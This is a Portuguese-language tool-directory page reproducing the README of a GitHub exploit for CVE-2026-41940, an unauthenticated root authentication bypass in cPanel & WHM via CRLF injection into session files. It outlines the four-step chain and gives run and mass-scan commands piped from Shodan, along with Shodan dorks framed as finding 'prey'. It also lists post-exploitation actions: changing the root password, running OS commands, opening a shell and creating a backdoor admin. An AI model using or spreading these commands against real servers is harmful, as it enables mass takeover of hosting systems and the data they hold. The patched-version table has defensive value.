Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41940 — cPanel & WHM - Bypass de Autenticação via Injeção CRLF em Arquivo de Sessão | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2026-41940
Autenticação e AutorizaçãoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoRed Teaming
GitHub0xgh057r3c0n/cve-2026-41940

CVE-2026-41940

cPanel & WHM - Bypass de Autenticação via Injeção CRLF em Arquivo de Sessão

Ver Repositório
1há 10h 20mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🔥 CVE-2026-41940 – Bypass de Autenticação cPanel & WHM

cPanel

⚡ Root Não Autenticado – Injeção CRLF em Arquivo de Sessão ⚡
“Uma cadeia para governar a todos.”

Python License No deps CVSS


🧠 O Exploit em Poucas Palavras

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  Etapa 1  ──  Gerar um cookie de sessão pré‑autenticação   │
│  Etapa 2  ──  Injeção CRLF via cabeçalho `Authorization`   │
│  Etapa 3  ──  Disparar `do_token_denied` (raw → cache)     │
│  Etapa 4  ──  Verificar acesso root do WHM via API JSON    │
└─────────────────────────────────────────────────────────────┘

💥 Resultado – Acesso root completo ao WHM, sem necessidade de credenciais.


📜 Licença

Este projeto é distribuído sob a Licença MIT – sinta-se livre para usar, modificar e distribuir, mas não seja malvado 😈.
Consulte o arquivo LICENSE para mais detalhes.


🛠️ Instalação – É Literalmente Uma Linha

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940

Zero dependências – apenas a biblioteca padrão do Python 3.
Você não precisa de pip, virtualenv ou qualquer dessas frescuras.


🚀 Início Rápido – Execute Agora

Alvo único

root@kitploit:~
./CVE-2026-41940.py -u https://target.com:2087

Varredura em massa a partir de arquivo

root@kitploit:~
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json

Pipe direto da natureza (Shodan, subfinder, etc.)

root@kitploit:~
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30

🎯 Opções de Linha de Comando (as coisas boas)


💀 Arsenal de Pós-Exploração

Depois de dominar a máquina, você pode:

  • 🔍 Listar todas as contas cPanel – --action list
  • 🔑 Alterar a senha de root – --action passwd --passwd "h4ck3d!"
  • 🖥️ Executar comandos do sistema operacional – --action cmd --cmd "id;whoami"
  • 📡 Shell interativo – --action shell (terminal WHM completo)
  • 👤 Criar admin backdoor – --action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"
  • 📂 Ler arquivos (via shell) – cat /etc/passwd
  • 📊 Coletar informações do servidor – --action info

🧪 Demonstração – O Que Você Verá

root@kitploit:~
$ ./CVE-2026-41940.py -u https://192.168.1.100:2087

  Configuração:
   Alvos    : 1
   Threads  : 10
   Timeout  : 15s
   Ação     : apenas varredura

[10:23:15] [SCAN] Iniciando cadeia de exploit em 4 etapas... https://192.168.1.100:2087
[10:23:15] [INFO] Hostname canônico descoberto: server.example.com
[10:23:15] [STEP] Etapa 1/4 — Gerando sessão pré-autenticação...
[10:23:16] [  OK] Etapa1: sessão pré-autenticação = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] Etapa 2/4 — Injeção CRLF via cabeçalho Authorization...
[10:23:17] [  OK] Etapa2: HTTP 302 → token=/cpsess1234567890
[10:23:17] [STEP] Etapa 3/4 — Disparando gadget do_token_denied (raw→cache)...
[10:23:18] [  OK] Etapa3: HTTP 401 — gadget do_token_denied disparado
[10:23:18] [STEP] Etapa 4/4 — Verificando acesso root do WHM...
[10:23:18] [INFO] Etapa4: HTTP 200  {"version":"11.118.0.63",...}
[10:23:18] [PWND] CVE-2026-41940 CONFIRMADO — Acesso root do WHM! (v11.118.0.63 — CONFIRMADO vulnerável)
[10:23:18] [PWND]   Token    : /cpsess1234567890
[10:23:18] [PWND]   Sessão   : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND]   Versão   : 11.118.0.63
[10:23:18] [PWND]   URL API  : https://192.168.1.100:2087/cpsess1234567890/json-api/version

  CVE-2026-41940 — Varredura Concluída
  Tempo: 3.2s  ·  Alvos: 1

  1 ALVO(S) VULNERÁVEL(IS)

  [*] Alvo     : https://192.168.1.100:2087
  [*] Versão   : 11.118.0.63
  [*] Token    : /cpsess1234567890
  [*] URL API  : https://192.168.1.100:2087/cpsess1234567890/json-api/version
  [*] Sessão   : 9a7f8e3d2c1b0a9f
  [*] Evidência: {"version":"11.118.0.63",...}

🔎 Dorks do Shodan (encontre sua presa)

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087

📊 Versões Afetadas – Status do Patch

Todas as versões abaixo dessas builds são vulneráveis.


🕵️‍♂️ Autor & Créditos

0xgh057r3c0n – pesquisador de segurança, engenheiro reverso e viciado em café.
GitHub | Twitter


⚠️ Aviso Legal

Esta ferramenta destina-se apenas a testes de segurança autorizados e fins educacionais.
O acesso não autorizado a sistemas de computador é ilegal. O autor e os colaboradores não são responsáveis por qualquer uso indevido ou dano causado por este software.
Use com responsabilidade e sempre obtenha permissão primeiro.


🌟 Suporte / Contribuição

  • Encontrou um bug? Abra uma issue.
  • Quer melhorar o código? PRs são bem-vindos.
  • Gostou da ferramenta? Dê uma ⭐ no GitHub!

🔥 Hackeie o planeta, mas permaneça legal. 🔥

Baixar ferramenta
FlagDescrição
-u, --urlURL do alvo único (ex.: https://host:2087)
-l, --listArquivo com uma URL por linha
--hostnameSubstituir o cabeçalho Host canônico (descoberto automaticamente)
-t, --threadsThreads (padrão: 10)
--timeoutTimeout em segundos (padrão: 15)
--rate-limitPausa entre alvos (segundos)
--actionPós-exploração: list, passwd, cmd, exec, info, version, shell, adduser
--passwdNova senha de root (com --action passwd)
--cmdComando do sistema operacional (com --action cmd/exec)
--new-userNovo nome de usuário cPanel (com --action adduser)
--new-domainNovo domínio cPanel (com --action adduser)
-o, --outputSalvar resultados em JSON
BranchBuild CorrigidaStatus
11.11011.110.0.97🛡️ Corrigido
11.11811.118.0.63🛡️ Corrigido
11.12611.126.0.54🛡️ Corrigido
11.13211.132.0.29🛡️ Corrigido
11.13411.134.0.20🛡️ Corrigido
11.13611.136.0.5🛡️ Corrigido